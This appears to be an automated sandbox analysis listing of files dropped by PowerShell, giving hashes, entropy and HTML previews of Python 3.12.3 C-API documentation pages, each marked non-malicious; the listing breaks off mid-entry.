                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1315), with CRLF line terminators
                              Category:dropped
                              Size (bytes):38118
                              Entropy (8bit):4.855039623443231
                              Encrypted:false
                              SSDEEP:768:+qyRt0M0ZePXeh9eCJsCCeCJsNJWeP2V6eCJOUfeCJO+JfeCJOrZsJYeCJOrSM2P:+qyQM0ZePXeh9eCJsCCeCJsNJWeP2V64
                              MD5:64A4967382B9586728095F62947076C9
                              SHA1:08C160C87AF093DB6AA296AA605E573078D6CE07
                              SHA-256:CA8B3F7FA2FEA9133E628038C1DA11A18DAA768AE02EB4AA03C2E8D25C449C4A
                              SHA-512:3BBB50B16CE7F6B0D7A49F329E5D6679089F5A9AE3FC616C7FACC9F49378951447B00963E6EFC87A561566CAB11303C71BA56618EA03B6E18351CD0434447C91
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="List Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/list.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>List Objects &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="../_static
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1093), with CRLF line terminators
                              Category:dropped
                              Size (bytes):72564
                              Entropy (8bit):4.8669890321048666
                              Encrypted:false
                              SSDEEP:1536:qqyqMTyredZebPeCJsp8eCJs0Jievx/VJdeiExAcJ1ePPvJ+e0xJJsevExI6JreU:kFg
                              MD5:E4052F22EB7520397F2F0CB422DF43E8
                              SHA1:A8B575C2D6D01347C134DFC759A33EA3B4FE08DF
                              SHA-256:9EB760BD665F2F475C64AE01161C003D10E141B823704616ED0C283A00886EFC
                              SHA-512:FF1FD1D746CBF347948B7599970127A52A156029A3C22B1145780053D0326675A095DC2F476C9D50180C6CA31E7CD45B758EBAD322F6A86142AF6EF93C658C9B
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Integer Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/long.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="All integers are implemented as .long. integer objects of arbitrary size. On error, most PyLong_As* APIs return(return type)-1 which cannot be distinguished from a number. Use PyErr_Occurred() to d..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="All integers are implemented as .long. integer objects of arbi
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1138), with CRLF line terminators
                              Category:dropped
                              Size (bytes):32689
                              Entropy (8bit):4.876693781272095
                              Encrypted:false
                              SSDEEP:768:aqyJZ4M15eCJleGeCJluPeCJlHJoeCJleCHrkSH7eCJleCHreJSiSP3eCJleJrlR:aqygM15eCJleGeCJluPeCJlHJoeCJleL
                              MD5:5B5A0C20BF99C44DB6DB0B7E5CB2B217
                              SHA1:946218CB5B0EF8CCCB126F76147CCBD0DA15745E
                              SHA-256:0CFB6374AF1AB7F3759A3F387283CEC14878D40F613792D51682F83802CDE039
                              SHA-512:31455CF41F996F7F4A24C30B2EB9D5932868D579A39451C794A50733134B02C1D495D095B016C3D94DE9048F1030DAA9B8886C7A5F1E0885B6FD04B847D2F4C2
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Mapping Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/mapping.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="See also PyObject_GetItem(), PyObject_SetItem() and PyObject_DelItem()." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="See also PyObject_GetItem(), PyObject_SetItem() and PyObject_DelItem()." />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (980), with CRLF line terminators
                              Category:dropped
                              Size (bytes):27348
                              Entropy (8bit):4.882288409260469
                              Encrypted:false
                              SSDEEP:768:LuxqyR8zMH0XevKUHAobNMqeeCJBUHAobPaJGeCJBobqZeYHAuq+aTleYHA8q+a+:WqyMMUXevKUHAobNMqeeCJBUHAobPaJx
                              MD5:34AE2B3BF34417AB6BCBCDF6D54D2650
                              SHA1:AED9721711F9115E6239A7AEC6984062EF76D485
                              SHA-256:D8ED281E602DC2E3CF261E722D4D0366C7D791D013BE125B29C04A1C0C724126
                              SHA-512:1ADDC73E3394FBF4C2D261A6F6D6119A196A4E22C406BB91E6D7F161B32764F2DCDA5965AC6D71BDC4E18A2254A5491D90051B2FCD556E7006F7248C73FEA97E
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Data marshalling support" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/marshal.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="These routines allow C code to work with serialized objects using the same data format as the marshal module. There are functions to write data into the serialization format, and additional functio..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="These routines allow C code to work with serialized object
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (867), with CRLF line terminators
                              Category:dropped
                              Size (bytes):101591
                              Entropy (8bit):4.904770652791002
                              Encrypted:false
                              SSDEEP:1536:mqy9MkeUcFHTe0ZsrHFe0mQXw2DZL5bHRerHsQZ1CerHsQ0Hde0ZLnHbe0mQXn2b:tUcO1Cz16T1dsdqrG4g
                              MD5:E7A109EEAEE6A04D2B153ADD299BF0EF
                              SHA1:C5732E0431F612E6A76688C2705E61F88BEB1D29
                              SHA-256:A75E8E0DFE8A657E47FE4EE6478C4DB12BC122167754B7368DFFB2283D40C264
                              SHA-512:397B18447F846E8EB8EE7D84D231B1EAEE1FF9A9F79E8F5DCF7FA2398FDC041CBBEBA57C89AE2408BEDD7D1383E35E7C13962AD329A079AFF1EA5791FBAED7BB
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Memory Management" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/memory.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Overview: Memory management in Python involves a private heap containing all Python objects and data structures. The management of this private heap is ensured internally by the Python memory manag..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Overview: Memory management in Python involves a private heap cont
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1031), with CRLF line terminators
                              Category:dropped
                              Size (bytes):24626
                              Entropy (8bit):4.951601243376123
                              Encrypted:false
                              SSDEEP:768:AqyLJMMqJjeCJp20eqeuJXe9HxrYoEQJWeixJ38iZJyeCJpoZZv8PHeCJpZJbeC+:AqyiMqJjeCJp20eqeuJXe9HxrYoEQJW/
                              MD5:244D809BFB4BFA9ECC9361C29162D13D
                              SHA1:0448CFD6C79901B82B6E8A100DEE779927AF2FDF
                              SHA-256:AB57C79B33B47F78AA31E4A41A8CD5AF5AECAF39485338E32328098E3038240B
                              SHA-512:1DB073C3DD566DB31EC42EAB69461A6CFB506D5CB9E849F46B4B11A0141F89D21D8D213267C59C1C8E2CA4C0006C4C8290FE3A3586CE2CB2EF16A5A4C97E0720
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="MemoryView objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/memoryview.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="A memoryview object exposes the C level buffer interface as a Python object which can then be passed around like any other object." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="A memoryview object exposes the C level buffer interface as a Python object which can then be passed around like any other object."
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1004), with CRLF line terminators
                              Category:dropped
                              Size (bytes):27464
                              Entropy (8bit):4.912250905283024
                              Encrypted:false
                              SSDEEP:768:3yqymCqTQM0tevjeCJlYJkeCJMlJceCJsMJxeCJsoMeh0eCJlFJ/eCJMeJwQJ5eD:CqyTM0tevjeCJlYJkeCJMlJceCJsMJxD
                              MD5:1CF1AE28A1AE7EB927CE3558A61EB152
                              SHA1:203AEABF6A59396D82C0F52A5D2E945FE58A445D
                              SHA-256:60FB9CA8B9A006068AB1BB14B8D367407479C45D1593BED7CCDB1570A7B7AA71
                              SHA-512:1A54AD79888434202F144E7849A0ADC714BC4614B4992F78CDDA2EF23CD300786019E86A85AD59A98A2D0C056BEE090F3D1C05773F2CA1404327DE2B6C80F57E
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Instance Method Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/method.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="An instance method is a wrapper for a PyCFunction and the new way to bind a PyCFunction to a class object. It replaces the former call PyMethod_New(func, NULL, class). Method Objects: Methods are b..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="An instance method is a wrapper for a PyCFunction and the ne
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1019), with CRLF line terminators
                              Category:dropped
                              Size (bytes):105105
                              Entropy (8bit):4.873253108646738
                              Encrypted:false
                              SSDEEP:1536:iqy5MQTevheCJsCOeCJsNJJeCJJuJWeiCHJvJ0eCJyG7JQeCJybCHfeCJywH/eCz:Fg
                              MD5:4102859F18EB7FE49FD3247C6E2D132C
                              SHA1:6F9B9B991025726136C26D626465F70D6354155F
                              SHA-256:46F210E8AF5958292538FBF9CD3A158EFC04AD81A110D47421D5921843C9F4D8
                              SHA-512:206FAD1D1D9296F5B2E9B463AAB58B099AF7C256EE5918CF012382530DB62E8B699EC810EF367E12807B084FCD26A39F3B8F667D5BEB3AF7595E849B37AA4CB3
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Module Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/module.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Initializing C modules: Modules objects are usually created from extension modules (shared libraries which export an initialization function), or compiled-in modules (where the initialization funct..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Initializing C modules: Modules objects are usually created from exte
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (396), with CRLF line terminators
                              Category:dropped
                              Size (bytes):15351
                              Entropy (8bit):4.859041556775392
                              Encrypted:false
                              SSDEEP:384:0HqklBawnuTM+UVJMeOVgSeChXgn8TMi76dqEC:4qyBBEM+uJMeGgSeChwSMi764N
                              MD5:13B5A9AEB89F18E1ECFEE8EF7D325601
                              SHA1:972EC36277470B4DCFF3FDA5A6A0531B252BE8B2
                              SHA-256:61DE1432B57FB12A5A5B84D8AA9E175C4E8A2A216CA801949AFAD2B68925F76B
                              SHA-512:CEFAF7C7A87FA17E7B6E7B9EDE19BF76A9E7C2611E493303CEB3348A569204EF70123E74CE7074B3638227F774E7F62DF0C215D880C9933D87AE34D8D5225E5F
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="The None Object" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/none.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Note that the PyTypeObject for None is not directly exposed in the Python/C API. Since None is a singleton, testing for object identity (using== in C) is sufficient. There is no PyNone_Check() func..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Note that the PyTypeObject for None is not directly exposed in the Pyt
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1284), with CRLF line terminators
                              Category:dropped
                              Size (bytes):78877
                              Entropy (8bit):4.814032396933495
                              Encrypted:false
                              SSDEEP:1536:0qypMW0eCJlAJmeCJSeJz/J9eCJSeJzOJxeCJSeJz7JUeCJSeJzGJmeCJSeJzhJx:sg
                              MD5:5340186F78D90746313F4626B2C9609F
                              SHA1:D33204253F9C5DAFFD322D19B978A362B116D7BB
                              SHA-256:18540D4DE6E149F274A359865D7A13BC10ABC27475F8EF4A7892DED61A0D2F51
                              SHA-512:AF2960E2A3589DB72507EAD4ABADE99EE8E1D833587F17F6B2CC209B19B8A4096E18E0CFDAA8CAAC0CF9B8D97AC27F56C1CB11C7B76B5C1AA403B2BF54F05B1A
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Number Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/number.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Number Protocol &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1198), with CRLF line terminators
                              Category:dropped
                              Size (bytes):22448
                              Entropy (8bit):4.887100931867726
                              Encrypted:false
                              SSDEEP:384:BHqklCrlnGTMob2qliMvtB2eIVJpeCHMcrJccB+eIVJpeMHMcrJc4BseIVJlkiMA:RqyChsMO2eCJpeCHMcrJcS+eCJpeMHMN
                              MD5:C673B4DE41142E7D613D46C1BA601298
                              SHA1:B889C5A288541C989F1C4826C5087BDB135763D2
                              SHA-256:97CF60328DA673BF415E58E6992CF9A51887333EEB014017FCABC8FCEA6272ED
                              SHA-512:7E1B864AFC10B4D9843ACBC43D3BB63DDC522407A65A1D2C0E769284CBC14617CE7CA9C7295CBE96DD9527AD8DFFD2C691CA671700CE0194C25A45F643D9ECF9
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Old Buffer Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/objbuffer.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="These functions were part of the .old buffer protocol. API in Python 2. In Python 3, this protocol doesn.t exist anymore but the functions are still exposed to ease porting 2.x code. They act as a ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="These functions were part of the .old buffer protocol
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1154), with CRLF line terminators
                              Category:dropped
                              Size (bytes):97068
                              Entropy (8bit):4.82427893690913
                              Encrypted:false
                              SSDEEP:1536:bqyjMTJZeHBeBqeYxeCJlUHgoE6VeCJleJDY4eCJleCHDLSLJQeCJleJD/JBeCJX:FENt/pMvg
                              MD5:41E5F97493467FF20C47A63598EA5275
                              SHA1:1E93BF9C4A86958FFF106C5A69B4B1F9718B89C5
                              SHA-256:885BFF9F047F1C62A4ECBD748485149AF7C732A0D9C415AE3C7500783D719C87
                              SHA-512:BBA88DB58A6B783018A8338DD37AEA8B4321BEA9A36D4743AC2713F9863FF5AF50C7AF3CC866089CDDC33700678A472556193E411D49A3C1D67F48339803BE19
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Object Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/object.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Object Protocol &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):16752
                              Entropy (8bit):4.87449704964025
                              Encrypted:false
                              SSDEEP:384:CcwlcHqkl8vmn1TMCunp5mVUqyn5TM3X76dqEC:rqy8OxMH7mVUntMH764N
                              MD5:F320520FDA975A75D63F07C76CC1BEB5
                              SHA1:3A988D6AC5F1042661E8789C7633B21313B8875F
                              SHA-256:A7E9A61705984E694631DA4C100E17FDBFFA1CFF45309E3B4A9E5E192F404279
                              SHA-512:8A5F8B56479768D4564530FDC60E2D0DEFEA6D6369827A58FC1F04E39EA28962E21431276B03190D27190531C4D588F0C98DDE9247D4DEE23547A60C2FC5CBE6
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Object Implementation Support" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/objimpl.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This chapter describes the functions, types, and macros used when defining new object types. Allocating Objects on the Heap, Common Object Structures- Base object types and macros, Implementing fun..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This chapter describes the functions, types, and macr
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1103), with CRLF line terminators
                              Category:dropped
                              Size (bytes):20192
                              Entropy (8bit):4.876514973239937
                              Encrypted:false
                              SSDEEP:384:3HqklSs1nqTMEmEqz6erQJFeiMH5OpoeCHIN0werDhbnITM/76dqEC:XqySoIMP6erQveiMH5OpoeCHIN0werDV
                              MD5:892CDF2046EF215A1FAC2673C4FB0A30
                              SHA1:0EC0487BE38A111753FE76B5120C129CFD25170A
                              SHA-256:EFFD231F6EB7EF78C9F845A5777835351AFA1863A8371100A62391EA7F7265E1
                              SHA-512:E3306C1A10724152CA5723FD300A44EC0B2B0F91B59222296B37D8332AAD8EA988DE29472BCE3876A9F64E649DC5446C4803843521DD23DB626E1057DEC13287
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Support for Perf Maps" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/perfmaps.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="On supported platforms (as of this writing, only Linux), the runtime can take advantage of perf map files to make Python functions visible to an external profiling tool (such as perf). A running pr..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="On supported platforms (as of this writing, only Linux), the
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (820), with CRLF line terminators
                              Category:dropped
                              Size (bytes):37929
                              Entropy (8bit):4.941077785140546
                              Encrypted:false
                              SSDEEP:768:6qyBt4MqbeCJl36YeCJlrlfAeCJlukt+NweCJlBJZeCJlMohZNJPeCJli0eCJlsV:6qy4MqbeCJl36YeCJlrlfAeCJlukt+N3
                              MD5:8801BA977A599E84FC2686704210D098
                              SHA1:95D582C907A192417AF6D3E6AC44A5B55A569EF7
                              SHA-256:DC6FC615F63CC64E126FD2F503F6E6BCC2B31CF06DDF6CCD596FE913933D8E85
                              SHA-512:3441189F423C53BF78C4C1F6C6FF85886C0FE0F28FD9DFE0092E06BA35BC453CDA5DF1010367DFA64ACA805DFB8BCA3E57332602399887E79C94DEC5EDB0C580
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Reference Counting" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/refcounting.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The functions and macros in this section are used for managing reference counts of Python objects." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The functions and macros in this section are used for managing reference counts of Python objects." />..<meta property="og:image:width" content="200" />..<meta pr
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (737), with CRLF line terminators
                              Category:dropped
                              Size (bytes):19346
                              Entropy (8bit):4.8923699527530315
                              Encrypted:false
                              SSDEEP:384:HHqklMdknJTMNVJWermVJOerlVJceroJxerHCHreIVJMNCHNeIVJM4uYsn9TMw75:nqyMa9M/JWersJOernJceroJxerHCHr6
                              MD5:F7EF7EF6A74A0D74ABCA752FE436B98B
                              SHA1:23F6A8DDD4C889BD379FE08787BB8FE8EEB9A557
                              SHA-256:D0CBB213F455E06CAB33EC2E2C8D219FE8ACFA95BC61C48A571DB37A3073FCAC
                              SHA-512:7B7A8D429E5F81CB2B8BA6476FAFE19853B1FDA3655E1756ED6C201DE44F60C6B457CF3FABA0068F1C09234DA8371E44754149074FE66BDEED0EE0180A048FD9
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Reflection" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/reflection.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Reflection &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="../_stat
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1310), with CRLF line terminators
                              Category:dropped
                              Size (bytes):50587
                              Entropy (8bit):4.837412214825317
                              Encrypted:false
                              SSDEEP:1536:0qyHMSUeCJl4ZeCJlEUeCJlpJNeCJSeJzAJGeCJlrmMJreCJSeJzSJYeCJlrmKJS:Mg
                              MD5:56B339BDF0E0710A6F053DCAA7EE3379
                              SHA1:C64E6C91A1E7E651ABB29057828D2A484CB29D3F
                              SHA-256:001178FF662655D87AD524018C5CFF292F764AF06549720D01603CCB8306BB8A
                              SHA-512:4A5CB6C98BEF458483A3B79A8BFE9ECAB885EEBD1FD2EA8A5993F282F3262A136734BE1F27637E966344FD49F966A550D6778A8BFEF249640502BFC2D9487824
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Sequence Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/sequence.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Sequence Protocol &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" hr
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (871), with CRLF line terminators
                              Category:dropped
                              Size (bytes):46531
                              Entropy (8bit):4.856628859617243
                              Encrypted:false
                              SSDEEP:768:yqyvlMMt3eC9PBeTve3zeCJstFeCJsZTeCJs8YeCJse4eCJs7qeCJslJqeCJcSo9:yqyGMt3eC9PBeTve3zeCJstFeCJsZTe1
                              MD5:FE67269735076CAE68EDBC4708AA18E1
                              SHA1:CB90E3218E15928762159DD2F266BA2842ABF880
                              SHA-256:F0252DF1FD4F4EE6D464D5DBC86443775BF53B009BA68059BF322D8F5423CEC9
                              SHA-512:D05F3A1B89ABCF3C6D4054E1997D15CD14101300976BAD4FCF948E051A17C5A9ECBEDCBEBC646B793D70338931F5E618BA03E7DF341BA906637BA67DFF3EA7BC
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Set Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/set.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This section details the public API for set and frozenset objects. Any functionality not listed below is best accessed using either the abstract object protocol (including PyObject_CallMethod(), Py..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This section details the public API for set and frozenset objects. Any func
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1921), with CRLF line terminators
                              Category:dropped
                              Size (bytes):34047
                              Entropy (8bit):4.853956486974159
                              Encrypted:false
                              SSDEEP:768:2qy2b0MFveyNeCJjcJEeCJUeJueJEnq4QeCJOrRrJUrJurJE9BeCJOrRrJUrJuri:2qylMFveyNeCJjcJEeCJUeJueJEnfQee
                              MD5:2E0D0C93BDD2E75929C0608F86EA28B1
                              SHA1:F92ADF9637D55271BD6D1C922CCBE3A32DB4F8BA
                              SHA-256:14AF15EAFB663F5B5B410241127B2AB690013F4A170AAC66DE6AB7C16D54D581
